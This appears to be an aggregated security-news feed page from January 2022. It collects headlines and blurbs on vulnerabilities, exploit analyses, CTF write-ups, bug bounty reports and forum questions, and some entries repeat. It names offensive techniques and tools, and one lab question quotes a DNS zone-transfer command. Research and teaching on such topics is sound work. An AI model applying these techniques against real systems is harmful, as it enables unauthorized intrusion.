    近日,Oracle官方 发布了 2022 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 497 个漏洞。此次修复的漏洞中包...  ( 1 min )
  • Open

    【安全通报】Weblogic 一月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 497 个漏洞。此次修复的漏洞中包...  ( 1 min )
  • Open

    Discovering a security vulnerability in a major grocery delivery platform
    Article URL: https://zerforschung.org/posts/gorillas-en/ Comments URL: https://news.ycombinator.com/item?id=29991743 Points: 235 # Comments: 70  ( 8 min )
  • Open

    2021年Linux恶意软件感染数量增长35%
    据统计,2021年内针对Linux设备的恶意软件感染数量上升了35%。  ( 1 min )
    FreeBuf早报 | 美国审查阿里巴巴云业务;美国民主党提出法案禁止网络监视广告
    时尚巨头 Moncler 证实,在 12 月被 AlphV/BlackCat 勒索软件行动窃取文件后遭遇数据泄露,并在暗网上公布。  ( 1 min )
    时尚巨头确认遭遇勒索攻击、1100万部手机已感染木马|1月19日全球网络安全热点
    <p><img src="https://image.3001.net/images/20220119/1642575002_61e7b49a7951f6c85d281.jpg!small" alt=  ( 1 min )
    网络犯罪案例分析:爬虫抢票(四十)
    开发爬虫进行抢票,非法获利12万元,触犯提供侵入、非法控制计算机信息系统程序、工具罪,判处有期徒刑三年。  ( 1 min )
    APT组织档案馆|2021年度APT组织活动态势分析
    本文为《APT组织情报研究年鉴》精华解读系列文章之一,本篇主要介绍年鉴中提到的绿盟科技2021年基于爬虫框架和知识图谱自然语言处理技术。  ( 1 min )
    美国商务部发布软件物料清单 (SBOM) 的最小元素
    定义SBOM的最小元素是一个迭代过程。本报告是起点而非定论。  ( 1 min )
    SAP 严重漏洞可导致供应链攻击
    CVE-2021-38178的CVSS 评分为9.1,其补丁在2021年10月 SAP 补丁日发布。该漏洞被描述为授权不当问题,可导致攻击者篡改传送请求,从而绕过质量门并将代码工件转移到生产系统。  ( 1 min )
  • Open

    CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)
    目标导读 1 前言 2 前置知识 2.1 JPEG文件格式 2.2 Perl模式匹配 3 exiftool源码调试到漏洞分析 3.1 环境搭建 3.2 漏洞简介 3.3 exiftool是如何解析嵌入的0xc51b标签 3.4 exiftool是如何调用parseAnt函数 3.5 parseAnt函数分析 3.6 parseAnt漏洞分析 4 漏洞利用 4.1 DjVu文件生成 4.2 JPG文件生成 5 漏洞修复 6 总结 前言 安全研究员vakzz于4月7日在hackerone上提交了一个关于gitlab的RCE漏洞,在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现未授权的在野利用,并发现了新的利用方式。根据官方漏洞通告页面得知安全的版本为13.10.3、13.9.6 和 13.8.8。该漏洞分为两个部分,分别是: CVE-2021-22005 Gitlab 未授权 exiftool RCE CVE-2021-22004 上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的,接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得,从中收获到自己独特的见解。 前置知识 同样的我也会在本篇文章中梳理一些前置知识来让读者更深入的了解漏洞,举一反三。 JPEG文件格式 本次漏洞可以通过读取正常的JPG图像文件的EXIF信息来触发漏洞,而JPEG的文件格式直接定义了e…

  • Open

    Is month of birth considered PII when combined with name (in California if that’s relevant?)
    I would like to add month of birth (without day/date/year) as criteria in a new active directory build, but cannot find a clear cut answer as to whether this is considered PII or not. Thank you in advance. submitted by /u/erpa2b [link] [comments]  ( 1 min )
    Is This Memory Diagram From Practical Malware Analysis Correct?
    I am reading through Practical Malware Analysis and I came across an image of a program's memory layout (Page 69). I have always understood that the stack started at a high memory address and grew towards a lower address, but the diagram in the book shows otherwise. Is there some aspect of this figure I am misinterpreting, or is there a reason why this specific image is different than the stack I am accustom to? Image in the Book: https://i.imgur.com/vLtI3eC.png My Current Interpretation of Memory: https://i.imgur.com/Rt7H4Oj.png Thanks for the help! *Reposted from r/netsecstudents submitted by /u/pufftux [link] [comments]  ( 2 min )
    Taking notes while learning a course
    Hi everyone, I am currently working as a cyber security analyst with about 1.8 years of endpoint security experience and overall 6 years of cyber security experience. Would like your opinion on whether taking notes while you learning a course like say wire shark or Linux is necessary? If no, why? If yes, what is the best way to take notes on something like one notes as I feel its difficult to take notes while watching a video. submitted by /u/aaronthecoolgnome [link] [comments]  ( 3 min )
    Client Certificate Authentication check
    In my company we need to implement Client Certificate Authentication in our web service. Certificates should be self signed and generated by the client. Then they send us the certificate without public key. My idea is that we store these certificates in the database. Now, I am not sure which field should I use to check authenticity of the certificate - thumbprint, subject, something else or multiple fields? I could also completely check public key in database against public key from incoming certificate. What are the recommendations for this scenario? submitted by /u/mandaric [link] [comments]  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? 3.) Why did "dig axfr xxxx.htb @10.10.10.xx " work? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Reso…  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Resources I've read so far (for those that stumble on this th…  ( 2 min )
    NIST compliant web application scanners
    What are some NIST compliant web app vulnerability scanners that you have come across? 50+ targets. submitted by /u/Dalgan [link] [comments]
    where can I view a full list of MDE detection and alerting rules?
    I've looked everywhere but it seems like this should be available. submitted by /u/slnt1996 [link] [comments]  ( 1 min )
    Can a server send an echo reply with different data?
    I know that's an unusual question, but I know I can send data to my server using ICMP packets (Hiding in the last 48 bytes of the packet, it could be more, but that could be suspicious), but can I receive data from the server? Looking at wireshark I realized the payload was the same in the reply submitted by /u/_JesusChrist_hentai [link] [comments]  ( 1 min )
    Trying to set up a isolated node on a lan network
    I have a secondary router off of my main network that I am trying to make as invisible to the rest of the network as I can. Off of that router I am trying to configure a raspberry pi 4b so it is as secure as I can make it. Potential threat vectors include individuals and small groups. submitted by /u/alonelyvoicespeaks [link] [comments]  ( 1 min )
  • Open

    BlueTeamLabs.Online
    Has anyone tried BlueTeamLabs.Online? I read there was a forensics pathway. Does anyone know if the forensics pathway is any good? Thanks! submitted by /u/DeadBirdRugby [link] [comments]  ( 1 min )
    Check Authenticity of Zip Creation Date
    Hello guys, i need help! Basically, a friend of mine mistakenly submitted the wrong assignment (zip file), later on he realized and emailed the teacher explaining the situation and attaching the right assignment (zip file) creation and modification date as a proof. The teacher says that anyone can revert the os date and zip the file resulting in unauthentic creation date of zip file. My friend wants to find a method to prove to the teacher that the right assignment (zip file) was done on time and its creation date & modification date is authentic. My friend uses windows 10 and is in desperate need of help. Any help will be deeply appreciated. submitted by /u/themidfinger007 [link] [comments]  ( 2 min )
    FORENSIC SOFTWARE RECOMMENDATION
    submitted by /u/tsipikau [link] [comments]  ( 1 min )
  • Open

    Zooming in on Zero-click Exploits (Project Zero)
    submitted by /u/albinowax [link] [comments]
    A Beginner’s guide into Router Hacking and Firmware Emulation
    submitted by /u/secnigma [link] [comments]
    Vulnerable AWS Lambda function - Initial access in cloud attacks
    submitted by /u/MiguelHzBz [link] [comments]
    Telenot Complex: Insecure AES Key Generation
    submitted by /u/0xdea [link] [comments]
    Dahua DVRs and Webcams bruteforcer at port 37777
    submitted by /u/falx1fer [link] [comments]
    Robust and blazing fast open-redirect vulnerability scanner with ability of recursevely crawling all of web-forms, entry points, or links with data.
    submitted by /u/falx1fer [link] [comments]  ( 1 min )
    Mixed Messages: Busting Box’s MFA Methods | Varonis
    submitted by /u/VaronisThreatLabs [link] [comments]
    How to securely implement TLS certificate checking in Android apps
    submitted by /u/Masrepus [link] [comments]  ( 1 min )
    An attempt to understand container runtime
    submitted by /u/alt-glitch [link] [comments]  ( 1 min )
    Public exploit POC for critical windows http RCE impacting multiple windows versions
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
    Stealing administrative JWT's through post auth SSRF - VMWare Workspace One Access (CVE-2021-22056)
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Destructive malware targeting Ukrainian organizations
    submitted by /u/SCI_Rusher [link] [comments]
    How to Analyze Malicious Microsoft Office Files
    submitted by /u/dmchell [link] [comments]
  • Open

    CALISHOT 2022-01: Find ebooks among 373 Calibre sites this month
    Happy New Year, Folks ! Here is the fresh new snapshot of the working calibre servers. Some minor improvements are coming with it: The sizes are now displayed The links to the covers are also provided. It's useful as you may know that a book is unavailable in realtime if the cover is empty, without having to click on the book link. ​ ANNOUNCEMENT: The calibre story started 2 years ago and during this long travel another sub more focused on this kind of content has been created for some various reasons. For this new year, I've decided to stop sharing the calishots in the current sub. If you're still interested in future dumps you can track them on the other one. Other resources will be proposed on it soon, like a wiki, tips, the datasets, original calibres, and some news about related tools like calisuck, calishot ... which are now turning into a single new project and will be released soon. Your contributions are also welcome on the sub. submitted by /u/krazybug [link] [comments]  ( 1 min )
    Help with scraping website with static .htm's (without sitemap)
    Hi Reddit, I've been trying to download this website (Cisco RV325 Emulator - Emulator) for full offline usage, and have used a variety of different tools with little success so far. I know it can be done because people have linked zip file downloads for other emulators in the cisco forums. I've tried wget, httrack, archivebox and several online website downloaders, however the problem I'm facing is as follows: If I download https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm I can load up the page locally but clicking on any of the menu items does nothing. It is just a static page which looks correct but isn't functional. I've tested winhttrack and wget settings of (-m -k) (-r -np -c) and another which uses (-l0) but I can't remember what the rest of the args were. From inspecting some of the urls using the online working version, I can see that each menu item has its own unique .htm page, which can be opened separately (online) if you just wanted to view that page and not be able to traverse to other pages (there is no menu bar). For example: Main Page - https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm Using the sidebar to go from Homepage > Port Management > Port setup, the online url is unchanged but clearly a separate static page for it exists because you can go to https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/lan_setting.htm and access the same thing (only that page's settings, not anything else) This means that if I downloaded this lan_setting.htm page and pointed to it in the local html, I should be able to access it right? The problem is that I don't know how to find all of these individual settings .htm page urls, and downloading them all manually and setting up local links in the main html file would take forever. ​ I hope I've explained this well enough, please accept my apologies in advance if I haven't ! submitted by /u/prymenumba [link] [comments]  ( 2 min )
    Worthy Bookmark: The Latest Google Dorks List - Jan 2022 DB Update
    submitted by /u/little_maggot [link] [comments]
  • Open

    Russian Roulette: Using Optical Character Recognition to investigate military equipment transfers
    What can we learn about Russian equipment transfers from a single Twitter video? Quite a lot, actually. Continue reading on Medium »  ( 3 min )
    Solución reto #IMINT #OSINT
    Este writeup es la solución a un reto planteado por el profesor Gordon Farrer, para mí un referente en este campo y una persona de la que… Continue reading on Medium »  ( 3 min )
  • Open

    How To Run Or Install Hakrawler Bug Bounty Tool on Kali Linux
    Hakrawler : Tool used to gather URLs and JavaSript file locations. Continue reading on Medium »  ( 1 min )
    Bug Bounty Program — Earn Up to 100,000 PTP
    Learn more about bug bounty program. Continue reading on Platypus.finance »  ( 1 min )
    My Bug Bounty Adventure -1-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Introducing the Exponent Bug Bounty Program in Collaboration with Immunefi
    Website | Litepaper | Twitter | Medium | Discord | Bug Bounty Program Continue reading on Medium »  ( 3 min )
    Bug Bounty Recon: Content Discovery (Efficiency pays $)
    Content Discovery — The process of finding vulnerable endpoints; URLs, Parameters and Resources. Continue reading on Medium »  ( 5 min )
    The New King “Broken Access Control”
    The King (Injection Bug) who was ruling the bug world for more than a decade is now conquered by the New King known as “Broken Access… Continue reading on Medium »  ( 1 min )
    Cross Site Port Attack in Wild
    Hello Hunter, Sorry for the delay of post and this is my first post in this year, I hope you’re all doing well and happy. So without… Continue reading on Medium »  ( 2 min )
  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )
  • Open

    SecWiki News 2022-01-18 Review
    以色列“飞马”间谍软件攻击事件的综合分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-18 Review
    以色列“飞马”间谍软件攻击事件的综合分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Go: Getting Started with Fuzzing
    Article URL: https://go.dev/doc/tutorial/fuzz Comments URL: https://news.ycombinator.com/item?id=29980566 Points: 1 # Comments: 0  ( 11 min )
  • Open

    The Tale of a Click leading to RCE
    In today’s industry, we often hear that humans may weaken a company’s security leading to a potential breach. At ManoMano we highly… Continue reading on ManoMano Tech Team »  ( 11 min )
  • Open

    Top 5 Best Fuzzing & Vulnerability Research TIPS
    submitted by /u/pat_ventuzelo [link] [comments]
    Rust vs. C: How are vulnerabilities different? An analysis on the vulnerabilities in the two programming languages and what to look for.
    submitted by /u/ragnarsecurity [link] [comments]  ( 1 min )
  • Open

    网络犯罪案例分析-12306抢票产业链
    买卖公民信息、开发注册软件,触犯侵犯公民个人信息罪和提供侵入计算机信息系统程序罪,判处有期徒刑三年,追缴违法所得。  ( 1 min )
    专访数字认证夏鲁宁:密码+云,解锁更多安全服务模式
    当传统的密码技术和热门的“云”相遇在一起,密码技术将焕发更强大的活力,给企业带来更多的优势。  ( 1 min )
    任天堂向用户发出警告,警惕虚假网站的Switch折扣
    这些网站使用官方标志来欺骗任天堂用户及粉丝,误以为这是官方页面,并以大幅折扣为诱饵,购买极有可能是“假货”的任天堂产品。
    2021年物联网设备CVE天梯榜
    作为一家专注于物联网安全的公司,统计了以下品牌部分评分较高的CVE编号以及描述等。  ( 2 min )
    研究人员在三种WordPress插件中发现高危漏洞
    WordPress安全公司Wordfence发现一项严重的漏洞,它可以作用于三种不同的WordPress插件,并已影响超过84000个网站。  ( 1 min )
    什么是SASE(安全访问服务边缘),一图看懂概念和应用场景
    这么火爆的SASE,一图看懂
    「网安知识大陆」有奖意见征集 | 一起来找“茬”
    知识大陆有奖收集意见反馈啦~  ( 1 min )
    FreeBuf早报 | Oracle在1月修复483个漏洞;Chrome 限制网站对专用网络直接访问
    2022年1月Oracle重要补丁更新 (CPU) 指出,Oracle安全更新将解决483个新的安全补丁,重要补丁更新是针对多个安全漏洞的补丁集合。  ( 1 min )
    2027 年零信任安全市场规模将达到 644 亿美元
    作为世界第二大经济体中国预计到2027年将达到111亿美元的市场规模。  ( 1 min )
    Linux环境中的三大恶意软件
    Linux系统通常部署在物联网设备中,最常见的是利用物联网设备进行DDoS攻击。其中前三大恶意软件是XorDDoS、Mirai和Mozi。  ( 1 min )
    苹果 Safari浏览器新漏洞敲响跨站用户跟踪的警钟
    防欺诈软件公司 FingerprintJS 日前披露, Safari 15中的IndexedDB API执行漏洞已经被恶意网站利用。  ( 1 min )
  • Open

    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    1.1      Intro I spent my early IT career working for a Cisco partner that specialized in Cisco phone systems. My work wasn’t directly with the phone systems, but it was usually in an adjacent field like route/switch and security. I did, however, get to see my share of networks that used Cisco phone systems. Today,... The post SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems appeared first on TrustedSec.  ( 5 min )
  • Open

    SSRF vulnerability in VMware authentication software could allow access to user
    Article URL: https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data Comments URL: https://news.ycombinator.com/item?id=29978942 Points: 3 # Comments: 0  ( 4 min )
  • Open

    XSS With Hoisting
    When dealing with JavaScript injection scenarios sometimes we might get into a difficult situation: the target page is not meant to be accessed directly and some of its code is supposed to use some other code in the setup intended. That leads to some broken script blocks and when the injection context is one of … Continue reading XSS With Hoisting The post XSS With Hoisting appeared first on Brute XSS.
  • Open

    IT Security in Web Anwendungen I — Injections
    Bausteine vieler Dienste dar. Insbesondere die strategische Ausrichtung vieler Unternehmen in die Cloud unterstreicht die kritische… Continue reading on Medium »  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    DOM XSS through ads
    Urban Dictionary disclosed a bug submitted by bemodtwz: https://hackerone.com/reports/889041

  • Open

    Chrome에선 이제 open 속성없이 XSS가 가능합니다.
    XSS가 가능합니다." />XSS 벡터 중 details 태그에 ontoggle 이벤트 핸들러와 open 속성을 이용한 방법이 있습니다. Chrome, Safari, Firefox, IE 모두 사용 가능하고 on* 기반의 XSS 중 비교적 쉽게 사용자 interaction을 줄일 수 있어서 자주 사용되는데요. test 최근 크롬 97 업데이트에 새로운 기능이 추가됬는데 바로 Auto-expand details elements 입니다. 직역하면 details elements에서 자동으로 expand 처리한다는 의미이고 이는 open 속성을 사용하지 않더라도 ontoggle로만 즉시 스크립트를 실행할 수 있다는 것을 의미합니다.
    안녕 Authz0, Authorization 테스트를 위한 새로운 도구 🚀
    저는 Authorization 테스트 시 ZAP의 Zest Script를 즐겨서 사용합니다. 예전에는 Burpsuite에서 Authz라는 Extension을 자주 사용했었구요. 어쩄던 이 도구들은 ZAP과 Burpsuite에 내장되어 사용되기 때문에 HTTP Raw Request를 사용할 수 있다는 엄청난 강점이 있지만, 반대로 너무 디테일한 기능과 Raw Reqeust의 필수 사용으로 인해 반대로 심플한 작업에서는 약간 불편함이 생기기 마련입니다. 그래서 지난주 주말부터 Authorization 테스트를 위해 도구를 하나 만들었고, 일요일 낮에 릴리즈하여 살짝 공유드려볼까 합니다. 오늘 소개해드릴 도구는 바로 Authz0입니다. What is Authz0 Authz0는 YAML 포맷 기반의 Template 파일을 중심으로 테스트할 URL과 Role을 구성하고, 이를 기반으로 스캔할 수 있는 도구입니다.
  • Open

    Is Google Authenticator impenetrable?
    Title is hyperbole obviously. Out of different 2FA methods SMS was weak because you could get sim swapped Authy was weak because a hacker could switch it to their phone if they could get into your email. GA can't be moved from phone to phone so it can't be taken over by hacker who gets access to your sim card and email. My impression is that any account protected by GA is safe. Why is this wrong? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    What is "round tripping" in HTML/GO?
    ELI5 if you can. I'm leaning so much from you guys! Thank you! submitted by /u/iExtrapolate314 [link] [comments]
    Newly created InfoSec role within IT department - what should I be doing to get it right?
    Hello AskNetSec! I'm not sure how else to word the title, so hopefully it's acceptable. Basically, I have been working in different facets of IT for 14 years. My current role is within IT operations as a systems engineer, but it's possibly evolving to be the first true role with an official information security component within the IT department at my company. I'm excited because I've always enjoyed the security aspects of my roles over my career, and my formal education was focused on information security. However, I recognize that I have no formal work experience in a security-specific role, and as such I feel like I'm "winging it". I don't really know what a formalized incident response looks like within an established security department. I don't know what tools I have at my disposal, or should have at my disposal, to do my job effectively. I also realize that I may be overthinking it. But truthfully, I have no point of reference. So I come to you all and ask for some opinions and insights to navigate as the sole person with these newly added responsibilities that I would liken to a security analyst, and do so in a way that makes sense and is effective. I'm happy to do my own reading and self-learning (I have access to PluralSight, if that would be useful), but also hoping maybe someone with experience can give some practical pointers and/or high-level procedural advice since I will likely be shaping this new role in coordination with my management. Thank you all in advance! Edited because my brain moved faster than my fingers could type :( submitted by /u/unseenspecter [link] [comments]  ( 5 min )
    How to create a rule that allows only one country with ModSecurity
    Hi all, Does anyone know how to write a rule for ModSecurity to only allow access to a website from one country? I'm currently using this rule: SecGeoLookupDb /usr/share/GeoIP/GeoIP.dat SecRule REMOTE_ADDR "@geoLookup" "chain,id:22,drop,msg:'Non-GB IP address'" SecRule GEO:COUNTRY_CODE "!@streq GB" Which is save in the rules directory as: modsecurity_crs_15_customrules.conf And I have also changed the owner of /usr/share/GeoIP/GeoIP.dat http for nginx. But the website is still getting traffic from outside of UK. Any help and pointers would be greatly appreciated. submitted by /u/Rurisk89 [link] [comments]  ( 1 min )
    Small business honeypot recommendations?
    I started working internal IT for a small business late last year who had been ransomed twice. Their (soon to be) ex MSP still had RDP open to the world, so no wonder... Anyway, among the many other projects currently running I'm considering setting up some honeypots for additional protection. The business still has a number of accounts with weak password tied to their applications so will be while before they're sorted out. Is this something that would be worthwhile? Any what tools have you used/would recommend? I'm looking for open source if/where possible. Thank you in advance :D submitted by /u/brettfk [link] [comments]  ( 1 min )
    Can HTTPS web traffic over a VPN be intercepted & decrypted if the router the PC is connected to is compromised? Can an attacker do this with tools available on a smartphone?
    submitted by /u/ferengiprophet [link] [comments]  ( 1 min )
    Can I make ensure a pdf is clean by "printing to pdf" before sending?
    I want to email a pdf I downloaded from Library Genesis. It's an old scanned book I couldn't find anywhere else. I need to share it, but on the off chance there's anything malicious there, is there anything I can do to send a "cleaned" version? If I create a new pdf by printing to pdf, would that be safe? submitted by /u/sonsa_geistov [link] [comments]  ( 1 min )
    What is an XSS injection? How is it used? What vulnerabilities does it create?
    Also, someone elsewhere on the internet claimed that XSS can get around Cloudflare. How? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
  • Open

    Lots of movies and TV shows in the "disk" folders, download speed is decent
    submitted by /u/feelingsupersonic [link] [comments]  ( 1 min )
    Browser Extension for Saving Images As While Browsing
    Before you tell me to just shill for a VPS, run a crawler and some scripts; I would like to offer some insight. I like collecting old web GIFs and pixel art. These are typically from websites which are hardly active, or in some cases no longer online. Places other people would, usually, share on r/opendirectories. Ergo, whenever I pick these out it's already going to be a manual process. I suppose I can just right click + save as, a few hundred times, but I have found Pinterest's "Save Button" to also be convenient. It's an extension that scans the entire page quickly, and you can choose what to save through a convenient menu, and it even builds a gallery for me. I want to reshare these, so I don't consider it a violation of my privacy that they are being exposed under my account name. False Account Suspensions aren't unheard of, but it's been working for me so far. Except whenever I need to save any image smaller than 100x100 pixels. Pinterest has a restriction requiring all images to be above 100x100 in resolution, so in this case you have to Save As, pad out the background and then upload. Which is again, a level of tedium I would like to avoid. So, would any of you lovely folks happen to know any decent alternatives? submitted by /u/themadprogramer [link] [comments]  ( 3 min )
    The chiptune archive is back!
    Hey all, it's been a long time. I had my chiptune archive brought down because of the domain, and now it's back, under my own domain. The link is https://chiparchive.com/files if you all want to talk to me on twitter. It's https://twitter.com/thechiptunearc1 submitted by /u/jreina2002 [link] [comments]
  • Open

    Critical XSS in chrome extension
    Chrome extensions have a feature to inject content scripts containing JavaScript code in a web page. By using the standard Document Object… Continue reading on Medium »  ( 2 min )
    Bug Bounty Hunting
    You might wonder what this bug bounty hunting is. Is it hunting bugs or what? Well certainly its you hunting down bugs but not the ones we… Continue reading on Medium »  ( 2 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here. Continue reading on InfoSec Write-ups »  ( 3 min )
    IDOR leads to 2fa Bypass
    Hello Everyone my name is Arth Bajpai and , I’m back with my another writeup Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - SQL INJECTION LAB ÇÖZÜMLERİ
    PortSwigger Web Security, web güvenliği zafiyetlerini barındıran, Owasp top 10 zafiyetlerinin yer aldığı laboratuvarlardan oluşan bir web… Continue reading on Medium »  ( 15 min )
    Jobs in Cybersecurity
    hello guys, are you excited to learn cybersecurity or ethical hacking ,You are curious about how things work and have thirst in learning… Continue reading on Medium »  ( 3 min )
    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    SSRF & Blind XSS in Gravatar email
    Automattic disclosed a bug submitted by rockybandana: https://hackerone.com/reports/1100096 - Bounty: $750
    Clickjacking
    Palo Alto Software disclosed a bug submitted by paramdham: https://hackerone.com/reports/688546
  • Open

    Registry Analysis - The "Why"
    Why is Registry analysis important? The Windows Registry, in part, controls a good bit of the functionality of a Windows system. As such, Registry analysis can help you understand why you're seeing something, or why you're not seeing something, as the case may be. For example, Registry "settings" (i.e., keys, values, or combinations) can be/have been used to disable Windows Event Logs, enable or disable auditing (the content that goes into the Windows Event Log), disable access to security tools, enable or disable other functionality on Windows systems, etc. The Registry can be used to enable or disable application prefetching, which produces artifacts very commonly used by forensic analysts and incident responders. Most analysts are aware that, particularly with respect to the file sy…  ( 7 min )
  • Open

    Analyzing Binaries with Radare2
    submitted by /u/DLLCoolJ [link] [comments]
    Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
    zimawhit3/HellsGateNim: A quick example of the Hells Gate technique in Nim
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: InternetDB API – Fast IP Lookups for Port and Vulnerability Information
    Article URL: https://internetdb.shodan.io Comments URL: https://news.ycombinator.com/item?id=29970480 Points: 2 # Comments: 0
    Same-origin violation vulnerability in Safari 15 could leak a user’s website
    Article URL: https://portswigger.net/daily-swig/same-origin-violation-vulnerability-in-safari-15-could-leak-a-users-website-history-and-identity Comments URL: https://news.ycombinator.com/item?id=29968460 Points: 37 # Comments: 13  ( 4 min )
  • Open

    Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure
    submitted by /u/obilodeau [link] [comments]
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
  • Open

    Algorithms for software testing
    submitted by /u/WillyRaezer [link] [comments]
  • Open

    SecWiki News 2022-01-17 Review
